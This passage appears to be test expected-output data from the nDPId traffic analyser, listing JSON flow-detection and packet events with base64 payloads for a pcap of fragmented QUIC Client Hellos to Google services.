pBWwpQfA3PntHJITXnxC4WmNYJAZCKBpSBcum+oGhD\/2Un0c0TlEt\/thcPjAZzpaUDcVhWpBWCVkKgQSFLnQ\/+DBcsrUFMD+140pVgLHMyZ9SjqlyJryDXQYG97OhxHyQHBDtRUXSWiUupn5VQi6HXycsWOMWUIstNHGKJXGdHz1DTnhQOAh42MqA2+rEX\/B24vMgaRhWIP3wZKncvN8OnaQB1uLmAogRZC7n6Oq2DPqNrKGHl266GYXia9wtsSy3dBXWQj5ABuS+XuL0dLpYt1yK3fxHMTM\/IAuOD+tETJOkfaID9ExjejoJQhKxG9A+2SEOwuBb0RuAAN64trhUk+RRj7+3dvdvvBaNmCF4ehH9m8kVXSuv99l731dIsTYFWF+01uzy3N0iDA4kBqgoPzkJX11gEEbpzeVX+FAdEn0TRFND5ubmH+ZdrnKSeLG87FfotS2"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1621516392665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516392665,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJJAAH4R+waokEAFfgNdWcQwAbsFTnBMwP8AAB0IERdUk7u04\/YAAEU0zZjp5d5N6z\/WFA1lBa7twBKX0QRDGLtlGmrXu8OpTBord0+OkbPX1c+PKlW1HAveX2hl7a2SKNkWfqYq58RzhqPWQX8bJuDEK8QKFY4N+fXvuJQuur2+wvIp6htGMnZMaAbzhBA68UXq8yqU4hc2a+yvi8q4Gw7qqb2E+jQUTHk\/UukIin5b3rNaLV29NbBtWWNxlePTd93OZVj7QCJVLus2fJCorUUrEQ+2qk5TnhfU9vsdmwx6IB0A2V9iCFudvKs3BZw6vMH3IleWL4m28gaDZFP\/Ll1+v0Cc0\/AhFgLuXnl4qKwc\/obxKbmZlIGLki5S8VSZsLsbZ0SY1dkVvRGgIQxLaExGsBGDsaP+GndXysNiZEoeGRVchLs2DAR9qG5bMjgc7F5c5b\/ooLBc6LekgqqXf0tYcNX1Ifb+9wWk9X7iYP2Nohxdjnln1PhhyFwwH33ccWEqs7INdIHG0pL4nnPScbjfx7yu4Bl0u5Gtz4zNTt9QkKj5iXyOT5Src6TBHalY8bYLvFDVN278pDT5QBdyLWL7oEpNfadXlpZ10SwBin7ywrf65HMlq5bMAPMBrYBhN2FpXmFM7cNtjWb2z2poAa89ojyAupp57XE\/vGPoBwccHb\/t4KO0u9+7ez5lsvxmpIWlCrsPHpI1g4mfO0K2EWFNk3Anr5nH0wYDaUe5wOdCxEbFvRUdCRA01RtABZ5xVMjlvM8apoN8Kn4WqEVHqc5yj0PWs63tUuuePQgwXAECstJsxODvlCazmTdvKFbpo4qJajXrsQCBK6CwTnJEHkWh2mXvAGZwTHKUoMREShbDu\/ALsa3MRdWCNgGf\/BKvqu3kEuPwv1flG9yIxqvtgt\/nUgVhX3\/Ca1qAiaNjv7PRG81n2utVIxCfJg2zDgTLIG+9kYRojM88Z50VdViswbxeaODbKLE4IZe70itf5BYmC5dKaOzsc1ubxfFZvyC5VvBiBKSYWr5eTrbV\/NAAOEFnJYlB25Y\/wg5kPi5dO6dlYjozGtNWPP69zhjoPqpEPKFrsuOmeoUe4bZiVs6v7uB2yz2vl80ozUBKDNkWC2YHCMAf9HVBqE\/Mrt2IBeml6QzS3foYzW8wnBHIkRYVazQQAL0CkiDaOIBs23kvmXeGNY5QiT\/Km9NqiagmZpg1i\/Uv\/usaNSyltg40pMPgJzU+fBzo6AsEexyAOsD0pOIzojnBHkDyfX8A0JBzcIDRpV9jCxmP7HsW1JHDjEKth33XOpXP4gDE6MpCcWx3aAQ25e\/Bbpo8NtEeXF+yfPpvkKflVU+1JItk4qF2JL18pe6Z67OwXqMeVLCHeCYdcqAj4sDp\/bAaRMI1tux95ugztq9AD9OCfXb7G9t26ZLM8YTPeASjTdA5CYfpVHz2sX+woEDbxgjEJDs3sZI2EbLnMd+FueWt5JCuzhqp3U5HyfeCPvU2mr2VjkVlXSb3047h4hytv8T4GBpas5I7NhJQapwTo5LfsKX7Mofqiz53K16cNDqT3ZnIMna\/K4y7sDYs2X9mNTMDSYNIa\/4FeLiBH8A9L+U+oFbNXmIyIVYmhmeDNmPteEfmJfyF4FJIw6CUlzL16NlD5ssHr4ol3Z79gMSJGLQS1wH+8WFBeMD0+KjhLFq\/QPvILGL9RPCnU5yLgqiEMFdnCJHT+ZurivJX+hoHYujvsctlp\/8PU5VIpt04NJgCfEENhOzbQEZU18nrANoFpuXZVXdkrNZsLZUOPV8zsYwed0ZzXePATCJOX6zTH2LfV9PIzmKH7BHP"} 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1621516392762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516392762,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJRAAH4R+wSokEAFfgNdWcQwAbsFTl1Yzf8AAB0IERdUk7u04\/YAAEU0eDSMkBqrJmW6EJydxfwYF72L5nA6GrUPS3rH7Z4vAyXuRcxweddOKkASX50YBAhvaLVxmGJ6U6qmlUaUw7wG8uSjq3TUIdXhWTeA+Z8ZzjqDFIfVneiA0t5M3mNujQZuBubvDwsegbm5eznV7L66suC6BXbOSCIHvH7evlKO6ATwg5tFxeLwg2dQBmNXzcLpzP1hzfGeMKtiH0JWitHqVA2mzm27Mqt1iHbI076Nsu\/4wMO\/W3XkBTDzfNpPgFnftIbYHoXizWVyohtZerA2ZvknSHAJeoqUBq7N0ufeG0vQIdU8hj48c7MRPCJCF9m695quzN39M4n681LXz0x+pX82b6l6TYZlG14513IC7J2U8oNEfwDSayIe8G0CHV1B3ACOgwK9t5t4KOGH7tv4L\/cA\/218vC9QHWHbroomZJmAC62kahwkvbYEjTzFd9QROuCb6woHQy+U88o9PpFuhfBgntQxEdQlqOWULrlZ6tbg2bSyiDxgnq2RrpAHjTxjl94pfsNUVIs9mK0OO8D5idshzlgmF6d17h7PFU6G9dorGkzm4NR6WUaKBOX+5gSFRrfk9rmnT3D53pwkp+KwVxARzjieguJXcogE0fhlCx+gKMRLvNXNYJlLzUoWsx6Y99ImuInElR30vXJvdA2zs2nyF4Izn+Sk2DvY+QdXvwE9gHT6M7D4sY5EHqjt6KAbClo9EWMzbzYhRdVBmotRbwUHzdWJoeafqSv6L3CKvUgJLKdu0YTajaVfkj41xch2Lohpe1p0RenuUsL7ERmQDgXPtrDNmvKz4XuAVEatNNYtceCXUr5rdb5Lay71T9qiuyJKgim3ApBGMzP2iOye5lAvL866w2TLUpfUcidNdjXakFFn9n65PMZ6mDXwIyth\/ETgBN7SyydimVKIk\/PkZC9Fg87f0vvO3grQHqUwDXSy5C0ztCgLy4Kaj+w39\/+zMgQLtjVs+9MRI+QyX4wHcxEAAKsDRVUal8I1t8UL25IJOIq86\/r0xJiOkSj0kF7WH9JqnNGH8+vmx6wgfCGnSI8zF1hr5NX3GOJjLqQ1U62XnJ90MIMkAhzBGer\/LGGVrS6W8xwobLnDBjP+gY09SHeFhdhAl\/eHpQg0s5R6ajAOqzjxGrHwtQziogeGwNpLFYXeX26h2mya6EHocWd4AXToiALDaPovQ7BUR40eP1NntQAWvSeuXAg4pR4Cun5d7LBjxkusmb3mE9H1Q+SLPzSC3KFAluSJZPze6abbazoXFzylXQTpl4YShg+w\/ZLee65FD7UbMvlCi2YOhpxl2oSVCkcd6UcWVItAiI91tALf89089cLcaf13TmGVO37bo8M60FjQZbY7IUQWTfBByLdIUrlG2l85aPi6R0Gv7Zgs9S7k6DvvsM2+Y8RZPzNE2yDKa3XOIxMuhHqpwcS1UiV9F8HZiDY7KAlK19HCyzGhwULC70LPMz+Lwyapr7kCcK6\/8uWl5EcgoBoQiGvXwUqKPqHplF5+pV\/+G96yrYK2729Ao1kcgwcblSXl7srLyRzMa1+N8EdtZ9w4xIIwWcmnoBW6k1pdwgIl3c9AZMQGynRVyFRdZE1ZgfE8pfV4nasitaR0M3gCMYKiLDWmRQiwD21k3IMkRH9lJ2iOuPUh9+SgcoHk8JKhhw+kVCfqGf7CsS8YItVTzzB+AlHzKfn5wPUKuhNr\/8ITyM1jWriraMh4v+v0GwqJXfRoEInWjIVWUPSsW3pM3ZIVbZ1\/BRcboa3+lLOz2oGo30HhPaksnLSu"} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1621516401935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516401935,"pkt":"AAAAAAAAAAEAsa95CABFAAViOQpAAH4R46+okEAFH9vSYPT\/AbsFTrroxP8AAB0IsiNjxAytUVgAAEU0Rqh1oTS7oO8cafTa28fAea2TrPFqW\/nlAJ184K2vdoORXSVeVMo9P99lJizlhuQtwjqOuZDX79HEkhTLfn6mYDJm73BPHv24qL5kCOPeP9TVOodlyLNO8CXYBxsAfImX9sw\/xiXEYv4nPCZx7phxoORVmsG2TXdTVZpBuZ8d7NkT8sYUuZrYsCN0\/vodaBZ64dqsKu\/0ntZ5Z7umvCbm7mnmp1P5JPIv8e5JTwTetx99GUoYM3Lss9UBBF+N+ZQAlvbgchHFwLlztR3qBr4DSeiBRa\/QCa9pwK0wrcW1wd7wQAaeeQE+HUQqzk21mGA3Ni9eqhg0A8mBSXeo4q6Zbc1Qge7LZjkMnbzwWQRN86QRzXhr6ZqznhJsrs2gf+6K0tcETEYFPcH1LtJTTUs0yfQDuzNUGO8Ljn5FQDD1zpRSvh8s7V0XLbAMDnVaIpCgJ\/Wzfpib6V2K6uy3y\/tnIOG\/KewueYVtxjddYzCJF8gOJKnl9hkHLvDnXYvahVHmmsSXkZEDuqEbBU3dhSvWdcTWMI6EGZ1la\/dvApDNmcb5oVn\/GyXnv8p4\/EaQDcSPgEq7tqrMT4zz16ib8ts2HPUFH18kMT2Lkh0kzLngKGYmQr4ud1DxA0Xh2OTA094JKybionwnwYmG0hB+bs0+W3t+x24Ktmr3UI23QaXnYhGjWDsFVhEwqC9edY1GzRBOF4JKsc9W3v+2U\/SN1VrKcc+Bevpa1\/hwmOmIR9UqFFRGYZ8XqCMSHhBSXZ98GHc6Tp8dIXH3GFzyONX70YreOQv70uYLLo5G7B3vB2RKjJ7e8jXDVU+JXnIlEp+p7OvLVmWZJ6HiKz1yl5dXohIS933mpnocVqWJKEIp+M6mIafetUbr7l3ub98qfRhhtDelAeHRUPJsEnbTDiebfukKletmLj2M9uqS88Nv+AYjq94MlKBVGJG0hWh9iwuuwJZCZQrbtQK7QrfvlcDDCr5e3q0MYyc3hLW0S3LNDLCzhZJHuh94K3qh3XmLNI48az6btORNC5VVHVviSCJzpyJi4AAhwk+vZEFTRHuM1FcBw3q6LFjAesbh3fvCHe8qk7EVnRd8k1OJ5pwTXlX6oar7LdQggPhSRol48jQ1hU6ZrFWWYfQPGtgNuW+QSDJwzQMXWphfVZa\/bjTSTMzzJaPxFEO8blcgWgJvyIWIDvvNVBD98ZAL8CsMvDFroJxvSZYdKcm6nvRcebluRLF9YOtvGfZtjUr\/cgCzoc03HDo0sme\/lIVgz3C75OcoWQzVAwwXgD9xeikHRVTVmRinnMrGdKATgKfjaUaxEe\/4wD1DfVumT5F9SapTR39kz6hwpsA7x0UFBknturrO+L+akqX6pIKp3yDxwqp2YSrQtxrQM2HIA0adAIfRYKkhcslIAE1vsvC5gIwRdKcF99Ry4D6WcmQtmyNTEyfKPVZfHdkM52cWvBas+\/FFczuVKVquG0n\/ExS78d7fjZpi2el681jYg7VOPeTHklXJ3AcX9vJRJlgZZPB6ZD\/pRbnoYkfAMjAtcvtRNTJbEv29pz2OQpvG9FDqKNggB4bJ4OOi9Yw0GTejnWMyT8AcCgKIWe5b\/j4tdp6cu+NFWIXuGtcykvaSvXLjzYQp51JSgMBZ\/5jwYYoRMQZPWnJD0NMzZbO\/PZqzoW54JcJfedD6PsbQwfEVZ9qO0uZe4XJyGo7xXMW9qheN5A485AGg930nGI0W4y9g06HYqEC6FZbTUGCQFaccVVPlPrwvI0zP0AD0MaiXvO5tGDdy"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"lh4.googleusercontent.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"lh4.googleusercontent.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1621516402235,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516402235,"pkt":"AAAAAAAAAAEAsa95CABFAAViORdAAH8R4qKokEAFH9vSYPT\/AbsFThF\/xP8AAB0IsiNjxAytUVgAAEU0VlWdZoCCvojlDyfa5Yeon08C9NEt7N1hxHGcl7FpDE5Z3Q9X5dOjGppxQuVZ+atKIAVvgbCcQVIhusNpashx33gtd6EhS7ZbKLvO4fc3PTuNql6Czjwc6b46RvYtjQHiYIFYBl31X9KsUf7sMEKMhQUWKvfytWSeM45U5GBkmLvf17D8qsLlZCvoAeY6VEYDPspoPXzAUYzFOsd5enOX3RMYkXxLlblB5gix22C\/+sUNmj+ugdjQw4gu\/fkb\/+jonN8oHz6zQAE\/PJV90A06PszzVUFctBVjZ+j5Pwz9BjozUZUg\/GO5kFR0Af1qvNMmXh\/0QoCYJzAEaSM5LZn5V9IadKyhWiAGb8bAhV2XnJfQfmszIOGoMMvaWthG2XAg6x\/4\/kCr95Ae0+tDiO2FzVaWI0nLPloEgW0+kB\/0TGNzL\/+Vy4YFY4PXcSh85eAiYwO2DkbrwC03nysw9v0D2V7rEHgNEO6ioGGuKv6mypXkj4bSQLPMzAkTM2MsPkC+fXW3f0l+0+za4NKOaY89pjaqW7bgVrOTpwQh35a6XwDDTLsphXxpOh7dlW0BzLzs03vnjLkokDqzkTmNyVYHQO8+a6C3JeLEnZTxFmQiaQ\/1gRzZm7cpY8RY0zhtz+q3FIkzaFIF\/AjKzGOOu8+5nsDUVUSfBS+fHZOKMM2eOjApm\/tZzcNNW1fwyIXL8V76UchSVNHrOV\/Piqka9R1tk0T+z1Vj7bcbIKNxTymIgfuZHLa2ehhiJRTVxdu4QeBCbNLbQ4jG7byE2A+bFbGS9ipIAYjoC9DnqCMgvL8Cm1jbkt2kO1+bEwS4X5aZJPdFzz2GBsHA6OGk5nmPDDOrC2sdqH58ShIcD+ZsAFb5MukWegKexiZGTPy5BYnViMh9Y9GI1jxJu5njnFXaIQ8qVdUruJxMtud99K9OjWpL94NFcooWggckaFlC21iuud67L15UsBMt83hjPDeakhUa4qZ0kj0gWALzdK205K5Wfz4DWhthyqf9fEU0GZOnTCjN7AnpkGQn2Hlp4OnoxtlX5VmufNf\/lVgf2ZeVPKUxlrBcNx2HEOHT4sZ7wIF\/3lwFsTvQKcix65Wug2ejeP3G\/83G9Qzq7h9g+PnVu8KncBYgcDGbeJP1jGd5F\/P6eUEylVpUxF4tuws0zlFKw2bJb8x6Y+cBLwGKHVC0PIzIUIpEH69fnkOGqSdaY0lRMXb\/EEra3O5ioR+LwgLTB92diG8Q5e0s\/v92K3HdzYSQ8TlwUeQ+x9woWExu3b9kGovPv3+jFRaFsbNxKvTVSEfjQDcafUTKOb\/3tA7k+tucr5my+7aGjn+bHbFFsjfBLkQLeS3GRbQpzQHhNjNEkEbiyp731MXybRhTCm+Y1qLET9TlYhBtjM8a05Qog2XwlqEM8wi+y\/CzGxubwbN4IWOhgTc1yngE04OAmEFZfH\/4awrr4YU9tLSzhbY9S3EHvvjjZpSTP0GsdZ92WziUPVAuGPfXB9clRlvNZdmbyGKYmxwvtpU\/5Dl\/GHlToInQQEgn2cmkuIp5zl\/9SUAMeYZhTS4JmDwPt30EK+TXkoGbxB4QQxockp24t2DasNgEbms8\/JVTW0JUJN2vNzbFOqVhPBBqAfcGjPeup16sTpvDGGHGSO4mJvUva77\/RTW+jGu67NC3sq2HErt3plviATd1Ww\/aNLcM+QsfCyX3a3A\/690D7ucSmy3lf\/i05xvjR7bo\/jVQ7KGbD6vK9Qm2U\/cQbTyFQzcqzPZgkKzr+l1adiNiIM8S"} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516402235,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516402235,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1621516405234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516405234,"pkt":"AAAAAAAAAAEATej1CABFAAViOZ5AAH4Raq6okEAFwUSpZOPvAbsFTiT5x\/8AAB0IzUnHeeUSQdQAAEU03jPmRxAy9OYylQgB73DOlVrCptv7ErpnY22OTRmr4wpzgeK3KwkGuqc0xjcaspxGnr6AdaN2xcChMtA2Y7IUI6FXy98k3lvliYUdwlbegMDaM0s2kOCEH3Q5e1wd\/wXjWcr6N0oOzawFyp9hVXwI7Q0kOSYeJlKwoxbwIoGt7YBZmAiPcan7Bi5oQyWPAWydB90gyIdx0d8HsFpltVW32pTZeG6z2CP9KXzoqL1WsfRBKPQpLg6kv3oYavjTBDOfvbG3i544r1+YdmIOCTSwSyCmI9DGVk8MczSIbJC0RPe4X9d\/gCsVsymdal9TdwxBqTtK7tvHTjEjpE2Tf9zS8Q8Gc5XsubCb6PKWxtWdDuV+ITz8lHNBp53kMGc9znlCSGBJ+oNWkpzQI4G8VgjVItmF+Zywys9D14q0rl8JP2cQboFSCzBrnPL2a2zEjzaiN8\/C2LlW8weYHLtePs7UcOLWgLnvnVwptNummGBctwDMgBNNvBf2oQ2BT3akVv85DLHFo7Mik5zFKo8Hm+zpDV42cxV43jlo01t6MR7pOAu2JhmZ1+Gmh9i4DhIdmnuAVFChlq0EBq1oKQrR4fmUxA2rjS0OXNZUgpLHLlJHctUJX60aeAJebb5ddjnK1JqXBjlvfbOAxFBhwR585AVOc\/N64kRyneM8sM9R6sU9iPp3yIrQOhQ0fDG2w0PRRpVMOhUEH7zw11a2+aNeZLGXC\/6Y0wE1yXsUVHJVJWZCYd86aXC4954s3IHZMqezQRrL1APK0Uj3+9FDgBevGUuM+k\/7d0zQnJ4rTTwqaISHNag4vkTDqKoEyOQwoaqyXKoPHPHUetc\/U1Vqj5HbYafoEp++uRVCALzeb9EokrzQzuCDkwwF8fL5EJSue04WpPsmcpNQzG8CgHMNpnU5AEbkeVy\/Tm60yzyRqb5aB2QQGaHn7nU734znkp6LBO+x8dI+\/uS4XkpdHKVM+kYZtiYdPByeui07cdpE8sH7XxtZdaodU1va3LT6DdZOGuWd3tIpMbwiom5ZO+c\/sxrsYNosVZXax\/HOCVpOj9VoxFKdAe7TnQA3BtohBLmAQi8Ky9PiOLlrtiEWSg9vuNLm8rQjNzi0+N0HK+xINajobf3jP8DLsPNa3nLBja1BI0rYBIU3yqIKQ8Dl32xsc063rGPnZ+4xKu9Myfb2s3u3GI3oGkrhwU\/1sQwXPwuGtN7SwiZALjqLgHgfC\/8El\/VnwzeViayYEnclukedsZZq1ZR3YWbmiKeCCwlk9jmv2WHZEh8jZQ02nH\/6uAirsc4PzXtVqbEdP3Uf\/51U+sQ2p6kyPgxPJ0dJiulfpzegAk1g9URlFtj1Prm9nXN52Avs85Ku6PnWn2K5Oit6t5szIh7CpXNXZ\/r7lQTCzx1x4hjw2bMC4\/V4zZV4WAYezFgThubuHBYUA88rT2uj7dCArSt2N45qbwc4Mgwud71EluROJDlek42tV+tCsyiaMJdhkWkSEEHDQPlPnH1ij3N1iW3QwoTcs+h7cVopFBb+GUTNIJl1Qk9qCEm5UYTfWF6aVd987Lzl3tTyv5D0h+cV+Wv94Y6Bu\/GmojJU611wdu67nR\/gcxGb0oSe62fODz9zWZV7kmDKM8ibcM\/HbDPHzMlg3XQsDk+2kA7o3GGvnoL0ABy\/WVJWStRZAa5xIrmxaZRdp8pG0k8n7D0+KdVj++U2WeulgSlFklaHDSc62eMMQsSdHdlV62KC3i0iGJUMvejrPxkl+j6oLKhMF1+skGbQ5aFITVGA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 